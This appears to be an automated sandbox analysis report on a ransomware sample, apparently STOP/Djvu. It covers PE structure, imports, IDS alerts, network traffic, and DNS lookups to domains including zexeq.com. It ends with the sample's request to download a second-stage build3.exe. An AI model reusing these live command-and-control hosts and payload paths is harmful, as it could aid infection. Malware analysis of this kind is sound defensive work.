                                                                                                      mov word ptr [ebp-00000240h], fs
                                                                                                      mov word ptr [ebp+0000FDBCh], gs

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [ASM] VS2013 UPD5 build 40629
                                                                                                      • [ C ] VS2013 UPD5 build 40629
                                                                                                      • [C++] VS2013 build 21005
                                                                                                      • [ASM] VS2013 build 21005
                                                                                                      • [ C ] VS2013 build 21005
                                                                                                      • [RES] VS2013 build 21005
                                                                                                      • [LNK] VS2013 UPD5 build 40629

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1085d00x154.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x12b0000x1e0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x12c0000xa32c.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xcc4600x38.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x105ac80x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xcc0000x3f0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xca5bc0xca6009d3505098e4eee3dc361c6bef0b26b98False0.5030461029184682data6.570129941575212IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xcc0000x3dba20x3dc007f270d34c464ae3d5aabd9eb0f21ffe1False0.3957845711032389data5.668469619748889IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x10a0000x203580x6400b9cff45acba0bf73d16290994acd3da3False0.4978125data4.939624310736174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x12b0000x1e00x2009c3280f335e8e346ce925599d24fcc62False0.533203125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x12c0000xa32c0xa40024f3bb349067df95682b9a6026a53082False0.6199980945121951data6.612523450234696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_MANIFEST0x12b0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      RPCRT4.dllRpcStringFreeW, UuidCreate, UuidToStringW, RpcStringFreeA, UuidToStringA
                                                                                                      MPR.dllWNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
                                                                                                      WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW, HttpQueryInfoW, InternetOpenA, InternetOpenUrlA
                                                                                                      WINMM.dlltimeGetTime
                                                                                                      SHLWAPI.dllPathAppendA, PathFindFileNameW, PathRemoveFileSpecW, PathFileExistsA, PathFileExistsW, PathAppendW, PathFindExtensionW
                                                                                                      KERNEL32.dllVirtualFree, WriteFile, GetDriveTypeA, OpenProcess, GlobalAlloc, GetSystemDirectoryW, WideCharToMultiByte, LoadLibraryW, Sleep, CopyFileW, FormatMessageW, lstrcpynW, CreateProcessA, TerminateProcess, ReadFile, CreateFileW, lstrcatA, GetEnvironmentVariableA, lstrcmpW, MultiByteToWideChar, lstrlenW, FlushFileBuffers, GetShortPathNameA, GetFileSizeEx, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, MoveFileW, FindClose, Process32FirstW, LocalAlloc, CreateEventW, GetModuleFileNameA, Process32NextW, lstrcatW, CreateMutexA, FindNextFileW, CreateToolhelp32Snapshot, SetEnvironmentVariableA, DeleteFileW, LocalFree, lstrcpyW, DeleteFileA, lstrcpyA, SetPriorityClass, GetCurrentProcess, GetComputerNameW, GetLogicalDrives, GetModuleFileNameW, SetStdHandle, GetVersion, CreateDirectoryA, CreateThread, CompareStringW, GetTimeFormatW, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleA, GetVersionExA, GlobalMemoryStatus, LoadLibraryA, FlushConsoleInputBuffer, WaitForSingleObject, CreateDirectoryW, SetFilePointerEx, CreateProcessW, FreeLibrary, SetErrorMode, lstrlenA, SetFilePointer, FindFirstFileW, SetConsoleMode, CreateFileA, GetCommandLineW, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetTimeZoneInformation, RaiseException, GetStringTypeW, GetConsoleCP, ReadConsoleW, GetConsoleMode, HeapSize, LoadLibraryExW, OutputDebugStringW, SetConsoleCtrlHandler, RtlUnwind, FatalAppExitA, GetStartupInfoW, GetExitCodeProcess, LCMapStringW, DeleteCriticalSection, AreFileApisANSI, ExitProcess, GetProcessHeap, HeapReAlloc, GlobalFree, SetEndOfFile, ReadConsoleInputA, CloseHandle, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, GetModuleHandleExW, WriteConsoleW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCurrentThread, GetCurrentThreadId
                                                                                                      USER32.dllPeekMessageW, PostThreadMessageW, DefWindowProcW, DispatchMessageW, UpdateWindow, CreateWindowExW, LoadCursorW, IsWindow, ShowWindow, RegisterClassExW, PostQuitMessage, GetMessageW, DestroyWindow, SendMessageW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetDesktopWindow, MessageBoxW, TranslateMessage
                                                                                                      ADVAPI32.dllRegCloseKey, CloseServiceHandle, GetUserNameW, ReportEventA, RegisterEventSourceA, DeregisterEventSource, CryptHashData, RegSetValueExW, CryptDestroyHash, ControlService, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, QueryServiceStatus, RegQueryValueExW, CryptReleaseContext, OpenServiceW, OpenSCManagerW, CryptAcquireContextW, CryptGetHashParam
                                                                                                      SHELL32.dllSHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteA, ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathA
                                                                                                      ole32.dllCoInitialize, CoInitializeSecurity, CoUninitialize, CoCreateInstance
                                                                                                      OLEAUT32.dllSysFreeString, VariantInit, VariantClear, GetErrorInfo, CreateErrorInfo, SetErrorInfo, VariantChangeType, SysAllocString
                                                                                                      IPHLPAPI.DLLGetAdaptersInfo
                                                                                                      WS2_32.dllinet_ntoa, inet_addr, gethostbyname
                                                                                                      DNSAPI.dllDnsFree, DnsQuery_W
                                                                                                      CRYPT32.dllCryptStringToBinaryA
                                                                                                      GDI32.dllDeleteObject, GetObjectA, SelectObject, GetDeviceCaps, GetBitmapBits, BitBlt, DeleteDC, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      192.168.2.4199.59.242.15049734802833438 02/12/24-01:36:15.166464TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4973480192.168.2.4199.59.242.150
                                                                                                      192.168.2.4199.59.242.15049732802020826 02/12/24-01:35:56.488809TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4973280192.168.2.4199.59.242.150
                                                                                                      192.168.2.4199.59.242.15049732802036333 02/12/24-01:35:56.488809TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4973280192.168.2.4199.59.242.150

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Feb 12, 2024 01:35:53.504321098 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:53.504363060 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:53.504525900 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:53.522245884 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:53.522259951 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:53.787203074 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:53.787517071 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:53.917454004 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:53.917512894 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:53.918488979 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:53.918673992 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:53.924410105 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:53.969902992 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:54.358319044 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:54.358407021 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:54.358437061 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:54.358505964 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:54.358535051 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:54.358586073 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:54.358596087 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:54.358644962 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:54.358711004 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:54.358762026 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:54.362032890 CET49729443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:54.362057924 CET44349729104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.100522995 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.100564003 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.100682020 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.109862089 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.109877110 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.360503912 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.360620975 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.377975941 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.378043890 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.378911018 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.378997087 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.382251978 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.425910950 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.948267937 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.948555946 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.948575020 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:55.948649883 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.949525118 CET49730443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:55.949563980 CET44349730104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.372761965 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.374233961 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.488317966 CET8049732199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.488534927 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.488809109 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.490606070 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.490717888 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.491031885 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.602648020 CET8049732199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.603971958 CET8049732199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.604015112 CET8049732199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.604048014 CET8049732199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.604057074 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.604135036 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.604135036 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.608273983 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.609514952 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.609550953 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.609584093 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.609615088 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:56.609647036 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:57.218672991 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:57.218753099 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:57.218846083 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:57.229270935 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:57.229301929 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:57.486032963 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:57.486248970 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:57.490833998 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:57.490858078 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:57.491246939 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:57.491341114 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:57.497946978 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:57.541976929 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.062700987 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.062935114 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.062989950 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:58.062990904 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:58.063595057 CET49733443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:35:58.063623905 CET44349733104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.166184902 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.283370018 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.283482075 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.283723116 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.400743008 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.402215004 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.402254105 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.402290106 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:35:58.402306080 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.402306080 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:35:58.402370930 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:01.604569912 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:01.722901106 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:01.722963095 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:01.722989082 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:01.723001003 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:01.723058939 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:01.723058939 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:03.479585886 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:03.598073959 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:03.598182917 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:03.598205090 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:03.598400116 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:06.791857958 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:06.910274982 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:06.910336018 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:06.910376072 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:06.910615921 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:06.910615921 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:06.910617113 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:09.784647942 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:09.784744024 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:09.784837008 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:09.803900957 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:09.803941965 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:09.965564013 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:10.059803963 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.059887886 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.064039946 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.064059019 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.064559937 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.064635038 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.066363096 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.084898949 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.084955931 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.084992886 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.084999084 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:10.084999084 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:10.085052967 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:10.113904953 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639273882 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639359951 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.639403105 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639460087 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.639472961 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639517069 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.639530897 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:10.639592886 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.640736103 CET49735443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:10.640763998 CET44349735104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:11.944216967 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:12.062108040 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:12.062120914 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:12.062130928 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:12.062176943 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:12.062176943 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:15.166464090 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:15.284982920 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:15.285053015 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:15.285073996 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:15.285355091 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:16.297498941 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.297528028 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.297621012 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.306591034 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.306605101 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.560812950 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.560906887 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.568059921 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.568068981 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.568696022 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.568806887 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.570950031 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:16.604013920 CET8049732199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:16.604093075 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:16.617901087 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146042109 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146102905 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.146125078 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146162987 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.146167994 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146207094 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.146213055 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146249056 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.146266937 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:17.146312952 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.147032976 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.147042036 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:32.063086033 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:32.063184977 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:35.284475088 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:35.284563065 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:03.457539082 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:03.457680941 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:47.040621996 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:47.352627993 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:47.961855888 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:49.165275097 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:51.571266890 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:56.383718967 CET4973480192.168.2.4199.59.242.150

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Feb 12, 2024 01:35:53.367844105 CET5877353192.168.2.41.1.1.1
                                                                                                      Feb 12, 2024 01:35:53.491553068 CET53587731.1.1.1192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.087999105 CET5596053192.168.2.41.1.1.1
                                                                                                      Feb 12, 2024 01:35:56.093097925 CET5027453192.168.2.41.1.1.1
                                                                                                      Feb 12, 2024 01:35:56.226680040 CET53559601.1.1.1192.168.2.4
                                                                                                      Feb 12, 2024 01:35:56.370719910 CET53502741.1.1.1192.168.2.4

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Feb 12, 2024 01:35:53.367844105 CET192.168.2.41.1.1.10x649dStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                      Feb 12, 2024 01:35:56.087999105 CET192.168.2.41.1.1.10xcc02Standard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                      Feb 12, 2024 01:35:56.093097925 CET192.168.2.41.1.1.10x3ca2Standard query (0)zexeq.comA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Feb 12, 2024 01:35:53.491553068 CET1.1.1.1192.168.2.40x649dNo error (0)api.2ip.ua104.21.65.24A (IP address)IN (0x0001)false
                                                                                                      Feb 12, 2024 01:35:53.491553068 CET1.1.1.1192.168.2.40x649dNo error (0)api.2ip.ua172.67.139.220A (IP address)IN (0x0001)false
                                                                                                      Feb 12, 2024 01:35:56.226680040 CET1.1.1.1192.168.2.40xcc02Name error (3)colisumy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Feb 12, 2024 01:35:56.370719910 CET1.1.1.1192.168.2.40x3ca2No error (0)zexeq.com199.59.242.150A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • api.2ip.ua
                                                                                                      • zexeq.com

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449732199.59.242.150806956C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 12, 2024 01:35:56.488809109 CET94OUTGET /files/1/build3.exe HTTP/1.1
